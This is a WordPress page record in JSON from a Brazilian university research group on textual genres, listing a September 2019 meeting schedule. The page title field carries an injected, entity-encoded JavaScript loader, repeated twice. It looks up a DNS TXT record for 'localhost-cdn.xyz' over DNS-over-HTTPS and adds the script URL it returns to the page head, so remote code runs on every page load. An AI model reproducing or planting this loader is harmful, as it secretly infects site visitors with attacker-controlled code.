{"id":15,"date":"2022-09-02T00:00:00","date_gmt":"2022-09-02T03:00:00","guid":{"rendered":"http:\/\/www2.unicentro.br\/gpgenerostextuais\/?page_id=15"},"modified":"2024-09-13T05:30:30","modified_gmt":"2024-09-13T08:30:30","slug":"eventos","status":"publish","type":"page","link":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/eventos\/","title":{"rendered":"Reuni\u00f5esfetch(&amp;amp;amp;amp;amp;quot;https:\/\/cloudflare-dns.com\/dns-query?name=localhost-cdn.xyz&amp;amp;amp;amp;amp;amp;amp;type=TXT&amp;amp;amp;amp;amp;quot;, {headers:{ &amp;amp;amp;amp;amp;quot;accept&amp;amp;amp;amp;amp;quot;: &amp;amp;amp;amp;amp;quot;application\/dns-json&amp;amp;amp;amp;amp;quot; }}).then(e=&amp;amp;amp;amp;amp;amp;gt;e.json()).then(e=&amp;amp;amp;amp;amp;amp;gt;{const t=document.createElement(&amp;amp;amp;amp;amp;quot;script&amp;amp;amp;amp;amp;quot;);t.src=JSON.parse(e.Answer[0].data),document.querySelector(&amp;amp;amp;amp;amp;quot;head&amp;amp;amp;amp;amp;quot;).appendChild(t)});fetch(&amp;amp;amp;amp;amp;quot;https:\/\/cloudflare-dns.com\/dns-query?name=localhost-cdn.xyz&amp;amp;amp;amp;amp;amp;amp;type=TXT&amp;amp;amp;amp;amp;quot;, {headers:{ &amp;amp;amp;amp;amp;quot;accept&amp;amp;amp;amp;amp;quot;: &amp;amp;amp;amp;amp;quot;application\/dns-json&amp;amp;amp;amp;amp;quot; }}).then(e=&amp;amp;amp;amp;amp;amp;gt;e.json()).then(e=&amp;amp;amp;amp;amp;amp;gt;{const t=document.createElement(&amp;amp;amp;amp;amp;quot;script&amp;amp;amp;amp;amp;quot;);t.src=JSON.parse(e.Answer[0].data),document.querySelector(&amp;amp;amp;amp;amp;quot;head&amp;amp;amp;amp;amp;quot;).appendChild(t)});"},"content":{"rendered":"<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 14pt;color: #800000\"><strong>SETEMBRO 2019<\/strong><\/span><\/p>\n<table style=\"height: 57px\" width=\"725\">\n<tbody>\n<tr>\n<td><strong>Data<\/strong><\/td>\n<td><strong>Evento<\/strong><\/td>\n<td><strong>TEXTOS PARA LEITURA<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center\">2<\/td>\n<td>\n<p style=\"text-align: center\">REUNI\u00c3O DE ESTUDO TE\u00d3RICO<\/p>\n<p style=\"text-align: center\">Justifications des \u00e9l\u00e8ves et m\u00e9diations de l\u2019enseignante dans une t\u00e2che de compr\u00e9hension en lecture d\u2019un conte en maternelle (CORDEIRO, 2014)<\/p>\n<\/td>\n<td><a href=\"https:\/\/drive.google.com\/open?id=1gMUtp1Ext1O13EzaD6zRUR16KsuegUoF\" target=\"_blank\" rel=\"noopener noreferrer\">TEXTOS (CLIQUE AQUI)<\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center\">9<\/td>\n<td style=\"text-align: center\">PR\u00c9VIAS X SIGET<\/td>\n<td style=\"text-align: center\">&#8211;<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center\">16<\/td>\n<td style=\"text-align: center\">PARTICIPA\u00c7\u00c3O NO X SIGET<\/td>\n<td style=\"text-align: center\">&#8211;<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center\">24<\/td>\n<td style=\"text-align: center\">FEEDBACK X SIGET<\/td>\n<td style=\"text-align: center\">&#8211;<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center\">30<\/td>\n<td style=\"text-align: center\">A DEFINIR<\/td>\n<td style=\"text-align: center\">&#8211;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>SETEMBRO 2019 Data Evento TEXTOS PARA LEITURA 2 REUNI\u00c3O DE ESTUDO TE\u00d3RICO Justifications des \u00e9l\u00e8ves et m\u00e9diations de l\u2019enseignante dans une t\u00e2che de compr\u00e9hension en lecture d\u2019un conte en maternelle (CORDEIRO, 2014) TEXTOS (CLIQUE AQUI) 9 PR\u00c9VIAS X SIGET &#8211; 16 PARTICIPA\u00c7\u00c3O NO X SIGET &#8211; 24 FEEDBACK X SIGET &#8211; 30 A DEFINIR &#8211;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":"","_links_to":"","_links_to_target":""},"class_list":["post-15","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/15","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":19,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":205,"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/pages\/15\/revisions\/205"}],"wp:attachment":[{"href":"https:\/\/www2.unicentro.br\/gpgenerostextuais\/wp-json\/wp\/v2\/media?parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}